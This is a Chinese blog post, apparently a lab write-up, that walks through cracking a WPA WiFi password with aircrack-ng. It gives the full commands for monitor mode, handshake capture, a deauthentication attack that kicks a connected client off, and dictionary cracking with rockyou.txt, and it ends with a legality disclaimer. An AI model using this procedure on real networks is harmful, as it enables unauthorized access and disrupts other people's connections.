記一次使用Aircrack"破解"實驗室無線網密碼

環境準備: 一臺kali Linux的虛擬機,一臺win10的物理機

1) 打開 網卡的Monitor(監控)模式

    > lsusb

在命令行運行 lsusb 查看當前系統的USB設備,因爲我這裏使用的是無線網卡,很明顯第一個設備就是插入的網卡,網卡爲Ralink類型,芯片爲MT7601U,已經自動安裝好驅動程序。
這裏寫圖片描述

airmon-ng

運行 airmon-ng 命令,查看可支持開啓Monitor模式的網卡,很明顯這就是我們插入的Ralink網卡。
這裏寫圖片描述

airmon-ng start wlan0

開啓監控模式,這裏的wlano就是使用airmon-ng 查看得到的Interface名字
這裏寫圖片描述
開啓監控模式後wlan0這個設備就會變爲wlan0mon,網卡的工作模式也變爲Monitor 可以使用iwconfig查看下。
這裏寫圖片描述

2) 當前當前環境下的WIFI網絡

airodump-ng wlan0mon

我們此次試驗破解的WIFI名稱爲TP-LINK_C4E7
這裏寫圖片描述

  • BSSID是AP端的MAC地址
  • PWR是信號強度,數字越小越好
  • Data是對應的路由器的在線數據吞吐量,數字越大,數據上傳量越大。
  • CH是對應路由器的所在頻道
  • ESSID是對應路由器的名稱

3)抓取握手包

當有新用戶連接WIFI,或者斷開WIFI中心連接的過程中會發送握手包,這是開啓監控模式的網卡就可以抓取到這個握手包。

airodump-ng -c 11 –bssid F4:83:CD:C9:C4:E7 -w ~/ wlan0mon

  • -c 指定頻道號,這裏是11
  • -bssid 指定路由器的bssid這裏是 F4:83:CD:C9:C4:E7
  • -w 指定數據包的地址 ~/表示存放在/root路徑下

這裏寫圖片描述

這裏的STATION就是當前連接到這個網絡的電腦的MAC地址(就是我啦),在電腦的CMD命令行中出入 ipconfig/all 命令就可以查看本機MAC地址。
這裏寫圖片描述

4) 強制連接到WIFI的用戶重新連接WIFI。

這時我們可以等新用戶使用密碼連接(誰知道會不會有新用戶連接(ㄒoㄒ)),時間是很寶貴的,所以我們要做的就是強制某個已連接的電腦斷開WIFI並且重新連接(PS. 基本上無法察覺,只是會斷網幾秒鐘),

aireplay-ng -deauth 2 -a F4:83:CD:C9:C4:E7 -c 38-B1-DB-FD-9B-23 wlan0mon

  • -deauth 表示進行解除認證攻擊(告訴已連接的電腦路由器不認識你了,需要你重新登錄) 後面的2表示攻擊的次數,如果爲0表示無線攻擊,被攻擊的電腦就無法連接WIFI了(PS.儘量不要這麼做)。
  • -a 後面指定路由器的bssid,前面已經提到過
  • -c 後面指定被攻擊的電腦的MAC地址

攻擊成功後抓包的界面就會顯示
這裏寫圖片描述

至此抓包過程就結束了,關閉網卡的Monitor模式

airmon-ng stop wlan0mon

5)破解密碼

破解密碼需要字典就和英語字典一樣,kali本身就帶有rockyou字典。這裏我已經解壓好了,第一次使用需要解壓。
這裏寫圖片描述
開始破解

aircrack-ng -a2 -b F4:83:CD:C9:C4:E7 -w /usr/share/wordlists/rockyou.txt ~/*.cap
- -b 後面指定路由器的bssid
- -w 指定字典位置 在後面跟抓到的包

破解完畢,因爲密碼超級簡單所以破解過程花了大概5s? (PS.這就是設密碼的時候要設置複雜的原因ヽ( ̄▽ ̄)ノ)
這裏寫圖片描述

Attention Please!!! 破解其他人的密碼是一種”違法”的行爲,此次破解的目的只是爲證明設置密碼要越複雜越好,絕無其它想法(( • ̀ω•́ )✧)。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章